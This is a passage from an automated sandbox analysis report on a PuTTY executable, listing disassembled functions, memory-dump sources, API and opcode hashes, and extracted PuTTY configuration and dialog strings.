                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Close$CreateOpen
                      • String ID:
                      • API String ID: 1299239824-0
                      • Opcode ID: ea6bdc6d0fe87ce883ce7ae428e77d2f7ab380fdb98498e39f7f47fe4c6a4590
                      • Instruction ID: 4579977186eed10a6eb61b97f6f0b8f7bafe9b36066a8b13f670d8ad66f710ec
                      • Opcode Fuzzy Hash: ea6bdc6d0fe87ce883ce7ae428e77d2f7ab380fdb98498e39f7f47fe4c6a4590
                      • Instruction Fuzzy Hash: 0731E233E2879251E620CB65B851B2BAB94AB94BD4F600031EE8D87B59DF7CD841EB04
                      Function 00007FF678626440 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Window$Rect$DesktopMove
                      • String ID:
                      • API String ID: 2894293738-0
                      • Opcode ID: 20ecea4b81a27fe78413c901b6bf14b61497c1ef27ae127f0af0f9314dea5a0a
                      • Instruction ID: 230517e177666fd829aa90b8244d139d2aba0a2e486cdeb4ac758269c4263c8a
                      • Opcode Fuzzy Hash: 20ecea4b81a27fe78413c901b6bf14b61497c1ef27ae127f0af0f9314dea5a0a
                      • Instruction Fuzzy Hash: C9119333B2851187EB10CB29F80451BBB60EBD5B90F649130EE8987B5CDE3DE9418F44
                      Function 00007FF6785F9B30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00007FF6785F9B8F
                      • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF6785F9B88
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                      • API String ID: 3015471070-2883471717
                      • Opcode ID: f2c6e618a18827751ec8177bb15fb0ac7d5fcf813854ffeaddd1338c36183962
                      • Instruction ID: ca8e6b9f298134e8ada5857bcf7b8f81e30ffd0bce9e2b7409b13021a72d8a35
                      • Opcode Fuzzy Hash: f2c6e618a18827751ec8177bb15fb0ac7d5fcf813854ffeaddd1338c36183962
                      • Instruction Fuzzy Hash: BF210533B28A0591FBA08B26C8447A93B90FB99BD4F644035CE0D83790DE3CDC86CB08
                      Function 00007FF6786AAD1C Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNELBASE(?,?,0000022102F9DBB0,00007FF67869AC4F), ref: 00007FF6786AAD35
                      • FreeEnvironmentStringsW.KERNEL32(?,?,0000022102F9DBB0,00007FF67869AC4F), ref: 00007FF6786AADA7
                        • Part of subcall function 00007FF6786A5070: RtlAllocateHeap.NTDLL(?,?,?,00007FF6786A3F1F), ref: 00007FF6786A50AE
                      • FreeEnvironmentStringsW.KERNEL32(?,?,0000022102F9DBB0,00007FF67869AC4F), ref: 00007FF6786AAE06
                        • Part of subcall function 00007FF6786A44E4: HeapFree.KERNEL32(?,?,?,00007FF6786A8382,?,?,?,00007FF6786A7F43,?,?,00000000,00007FF6786A8C14,?,?,?,00007FF6786A8B1F), ref: 00007FF6786A44FA
                        • Part of subcall function 00007FF6786A44E4: GetLastError.KERNEL32(?,?,?,00007FF6786A8382,?,?,?,00007FF6786A7F43,?,?,00000000,00007FF6786A8C14,?,?,?,00007FF6786A8B1F), ref: 00007FF6786A4504
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: EnvironmentFreeStrings$Heap$AllocateErrorLast
                      • String ID:
                      • API String ID: 1848424169-0
                      • Opcode ID: a45e6d22cd07cd63e0af45f8e0aec387eba93631c0cee08984bed8e70762c5ed
                      • Instruction ID: 044e9115930f9e0cdd1af2cc133dbd9e3a492147ae3abfae350b9c1d091f4a76
                      • Opcode Fuzzy Hash: a45e6d22cd07cd63e0af45f8e0aec387eba93631c0cee08984bed8e70762c5ed
                      • Instruction Fuzzy Hash: 4831B723A2876295E664EF32644007B7EA0FF44BD1F644136EA8E83BD5DF3CE8115749
                      Function 00007FF6785F4A30 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Window$ItemLongText
                      • String ID:
                      • API String ID: 1037592912-0
                      • Opcode ID: 2f7e87638be09f0d97eed6ddadb0bd939be1b2192e324775db65a7082ae107af
                      • Instruction ID: 8f1f8556b9fecd82a0adc09b9972957f839501792e886a507da92a7f2cd83c97
                      • Opcode Fuzzy Hash: 2f7e87638be09f0d97eed6ddadb0bd939be1b2192e324775db65a7082ae107af
                      • Instruction Fuzzy Hash: 7BF0C813B25511C2FE195772A84467A2691DF55F90F348130C92DCA3E8DE2C9D83D70C
                      Function 00007FF6785F29F0 Relevance: 4.5, APIs: 3, Instructions: 18COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Window$ActiveCreateDialogParamShow
                      • String ID:
                      • API String ID: 4156068129-0
                      • Opcode ID: 594769b5ef74b6407d61c6ea7239f5212f48eb2a6803754689cca1e48bf82949
                      • Instruction ID: 7df9662346cd06a16cdf8539e01e845e47cb725331f0546ac4fc44865638e4ed
                      • Opcode Fuzzy Hash: 594769b5ef74b6407d61c6ea7239f5212f48eb2a6803754689cca1e48bf82949
                      • Instruction Fuzzy Hash: 83E0121AA39A2192F7049B35A8187762721AB98B50F504430CC5EC2764CF3CDA469E08
                      Function 00007FF678624D90 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: LongWindow
                      • String ID:
                      • API String ID: 1378638983-0
                      • Opcode ID: e97cadac6e52da1d43d57e83d769fa2f00492fef06e9a45af8a1d9a733207641
                      • Instruction ID: 35fd091c643fda16b6069d0cfb9a6ffd13ece808ff3d46c299b1601f46c73dd9
                      • Opcode Fuzzy Hash: e97cadac6e52da1d43d57e83d769fa2f00492fef06e9a45af8a1d9a733207641
                      • Instruction Fuzzy Hash: 28F08927710B5492EA01CB57DD446655B60F7A8FE0F248471DE0C83B54DE38D9979700
                      Function 00007FF6785FA20C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: TextWindow
                      • String ID:
                      • API String ID: 530164218-0
                      • Opcode ID: b85605ddeebc4c515b878ddd3bba1f08587fade2082e769378aa296b3e607999
                      • Instruction ID: e8e9c398a4296539c92a458506ffdc78b41e589feb806a13d182852222fadbee
                      • Opcode Fuzzy Hash: b85605ddeebc4c515b878ddd3bba1f08587fade2082e769378aa296b3e607999
                      • Instruction Fuzzy Hash: 4DE0E523A0904346E947DA26B4455691F80BB84BF4F818831CF0953281EF38DEC6D700
                      Function 00007FF6786A5070 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 68853461a1403baadffb08df0f75db0ede80dfcaad64afb894515b0aba0f6205
                      • Instruction ID: dfe0e85a5d3d112c59afac572fbde401d60dcd071d5f2ccaf63094be25f51d82
                      • Opcode Fuzzy Hash: 68853461a1403baadffb08df0f75db0ede80dfcaad64afb894515b0aba0f6205
                      • Instruction Fuzzy Hash: 00F05403A2A212A6FE54A7B158C56771A804F45760F290234D82EC53C6DE1CEC41655A
                      Function 00007FF6785FA1D2 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: TextWindow
                      • String ID:
                      • API String ID: 530164218-0
                      • Opcode ID: c70fe196b795f3c47ddd80d426c3a8baf32a1ec1110fd013186a2216e6d28506
                      • Instruction ID: ea89ae6227470694891071a5886aaf8687ca3a4212cf6674d1ec2d659cd054c1
                      • Opcode Fuzzy Hash: c70fe196b795f3c47ddd80d426c3a8baf32a1ec1110fd013186a2216e6d28506
                      • Instruction Fuzzy Hash: 7DE0DF17B1A11246E887DB16B8404A90E00BB88BF1B904831CF1D97381EE3D9DC3A704
                      Function 00007FF6786162C0 Relevance: 1.5, APIs: 1, Instructions: 21libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: DirectorySystem$LibraryLoad
                      • String ID:
                      • API String ID: 2489551175-0
                      • Opcode ID: 27c62e6d549d8a15bceb22169e8481e9014216941cf5d71124ba8faee8632f71
                      • Instruction ID: 94efbb22a36da23bf60089ffaa20496af257da09b11c0aee9a9791a0c7839e9a
                      • Opcode Fuzzy Hash: 27c62e6d549d8a15bceb22169e8481e9014216941cf5d71124ba8faee8632f71
                      • Instruction Fuzzy Hash: B5E0C202F2A2AA61FC48B73B3E596AA0A500F89FD1B644830CC0E87F46EC1CAD825304

                      Non-executed Functions

                      Function 00007FF678607010 Relevance: 249.1, Strings: 198, Instructions: 1553COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: %d,%d,%d$%s%d$/$ANSIColour$AddressFamily$AgentFwd$AltF4$AltOnly$AltSpace$AlwaysOnTop$Answerback$ApplicationCursorKeys$ApplicationKeypad$AuthGSSAPI$AuthGSSAPIKEX$AuthKI$AuthPlugin$AuthTIS$AutoWrapMode$BCE$BackspaceIsDelete$Beep$BeepInd$BellOverload$BellOverloadN$BellOverloadS$BellOverloadT$BellWaveFile$BlinkCur$BlinkText$BoldAsColour$BugChanReq$BugDeriveKey2$BugDropStart$BugFilterKexinit$BugHMAC2$BugIgnore1$BugIgnore2$BugMaxPkt2$BugOldGex2$BugPKSessID2$BugPlainPW1$BugRSA1$BugRSAPad2$BugRSASHA2CertUserauth$BugRekey2$BugWinadj$CJKAmbigWide$CRImpliesLF$CapsLockCyr$ChangeUsername$Cipher$CloseOnExit$Colour%d$ComposeKey$Compression$ConnectionSharing$ConnectionSharingDownstream$ConnectionSharingUpstream$CtrlAltKeys$CtrlShiftCV$CtrlShiftIns$CurType$DECOriginMode$DetachedCertificate$DisableArabicShaping$DisableBidi$EraseToScrollback$FontQuality$FontVTMode$FullScreenOnAltEnter$GSSCustom$GSSLibs$GssapiFwd$GssapiRekey$HideMousePtr$HostKey$HostName$LFImpliesCR$LineCodePage$LinuxFunctionKeys$LocalEcho$LocalEdit$LocalPortAcceptAll$LocalUserName$LockSize$LogFileClash$LogFileName$LogFlush$LogHeader$LogHost$LogType$LoginShell$MouseAutocopy$MouseIsXterm$MouseOverride$MousePaste$NetHackKeypad$NoAltScreen$NoApplicationCursors$NoApplicationKeys$NoDBackspace$NoMouseReporting$NoPTY$NoRemoteCharset$NoRemoteClearScroll$NoRemoteResize$NoRemoteWinTitle$PassiveTelnet$PasteControls$PasteRTF$PingInterval$PingIntervalSecs$PortForwardings$PortNumber$PreferKnownHostKeys$Present$Printer$Protocol$ProxyDNS$ProxyExcludeList$ProxyHost$ProxyLocalhost$ProxyLogToTerm$ProxyMethod$ProxyPassword$ProxyPort$ProxyTelnetCommand$ProxyUsername$PublicKeyFile$RFCEnviron$RXVTHomeEnd$RawCNP$RectSelect$RekeyBytes$RekeyTime$RemoteCommand$RemotePortAcceptAll$RemoteQTitleAction$SSH2DES$SSHLogOmitData$SSHLogOmitPasswords$SSHManualHostKeys$SUPDUPCharset$SUPDUPLocation$SUPDUPMoreProcessing$SUPDUPScrolling$ScrollBar$ScrollBarFullScreen$ScrollOnDisp$ScrollOnKey$ScrollbackLines$ScrollbarOnLeft$SerialDataBits$SerialFlowControl$SerialLine$SerialParity$SerialSpeed$SerialStopHalfbits$ShadowBold$ShadowBoldOffset$ShiftedArrowKeys$SshBanner$SshNoAuth$SshNoShell$SshNoTrivialAuth$SshProt$StampUtmp$SunkenEdge$TCPKeepalives$TCPNoDelay$TelnetKey$TelnetRet$TermHeight$TermWidth$TerminalModes$TerminalSpeed$TerminalType$TrueColour$TryAgent$TryPalette$UTF8Override$UTF8linedraw$UseSystemColours$UserNameFromEnvironment$WarnOnClose$WideBoldFont$WideFont$WinNameAlways$WindowBorder$WindowClass$Wordness%d$X11AuthFile$X11AuthType$X11Display$X11Forward$Xterm256Colour$raw
                      • API String ID: 0-3441272646
                      • Opcode ID: e7e2492451285eaabcdf35f624091d56ce1b81eaafc784d96cb14073e079dd9f
                      • Instruction ID: bfcf42d30b03df5881fea2816e91e520663623e95072a23ae22d6cf5fa87c003
                      • Opcode Fuzzy Hash: e7e2492451285eaabcdf35f624091d56ce1b81eaafc784d96cb14073e079dd9f
                      • Instruction Fuzzy Hash: 76D26193F3821661EE04A771E8526B71A52AF80FC0FB09531DC4D8BB87DD6CE905A26D
                      Function 00007FF678623EA0 Relevance: 126.9, Strings: 101, Instructions: 686COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: (Codepages supported by Windows but not listed here, such as CP866 on many systems, can be entered manually)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/config.c$About$Action of mouse buttons:$Adjust how %s displays line drawing characters$Adjust the window border$Allow selection of variable-pitch fonts$AltGr acts as Compose key$Attempt to use logical palettes$Beep using the PC speaker$Caps Lock acts as Cyrillic switch$Change font size only when maximised$Change the number of rows and columns$Change the size of the font$Character set translation on received data$ClearType$Compromise (Middle extends, Right pastes)$Connection/Proxy$Connection/SSH/X11$Control the scrollback in the window$Control use of mouse$Control-Alt is different from AltGr$Copy to clipboard in RTF as well as plain text$Custom sound file to play as a bell:$Default$Disabled$Display scrollbar in full screen mode$Enable extra keyboard features:$Ensure window is always on top$Flashing$Font has XWindows encoding$Font quality:$Font settings$Forbid resizing completely$Formatting of copied characters$Full screen on Alt-Enter$General options for colour usage$Help$Non-Antialiased$Play a custom sound file$Select X authority file$Select bell sound file$Set the size of the window$Set the style of bell$Steady$Sunken-edge border (slightly thicker)$System menu appears on ALT alone$System menu appears on ALT-Space$Taskbar/caption indication on bell:$Terminal/Bell$Terminal/Keyboard$Use font in OEM mode only$Use font in both ANSI and OEM modes$Use system colours$Wave Files (*.wav)$When window is resized:$Window$Window closes on ALT-F4$Window/Appearance$Window/Behaviour$Window/Colours$Window/Selection$Window/Selection/Copy$Window/Translation$Windows (Middle extends, Right brings up menu)$X authority file for local display$X11 forwarding$basics$c->handler == conf_radiobutton_handler$config-altf4$config-altonly$config-altspace$config-alwaysontop$config-bellstyle$config-belltaskbar$config-charset$config-compose$config-ctrlalt$config-cyr$config-font$config-fullscreen$config-logpalette$config-mouse$config-rtfcopy$config-scrollback$config-ssh-xauthority$config-syscolour$config-winborder$config-winsizelock$features$font$format$general$linedraw$main$scrollback$size$trans$tweaks$x11$xterm (Right extends, Middle pastes)
                      • API String ID: 0-2910557738
                      • Opcode ID: 680a59dbf6e0c49f472116186466a9079699f6c30498090e3e8bcadaeabe9169
                      • Instruction ID: 8e1882f631d4294e9de082e8150342a052e0c39884d6eafde3efc9c2c6267f83
                      • Opcode Fuzzy Hash: 680a59dbf6e0c49f472116186466a9079699f6c30498090e3e8bcadaeabe9169
                      • Instruction Fuzzy Hash: B9729F33A28A46A5EA10DB31F4402BB7BA1FB84784F700136DA8D87795DF3CE915E758
                      Function 00007FF678605310 Relevance: 88.9, APIs: 2, Strings: 48, Instructions: 1391COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
